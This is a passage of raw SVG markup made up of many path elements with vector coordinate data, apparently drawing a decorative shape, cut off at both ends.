d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path 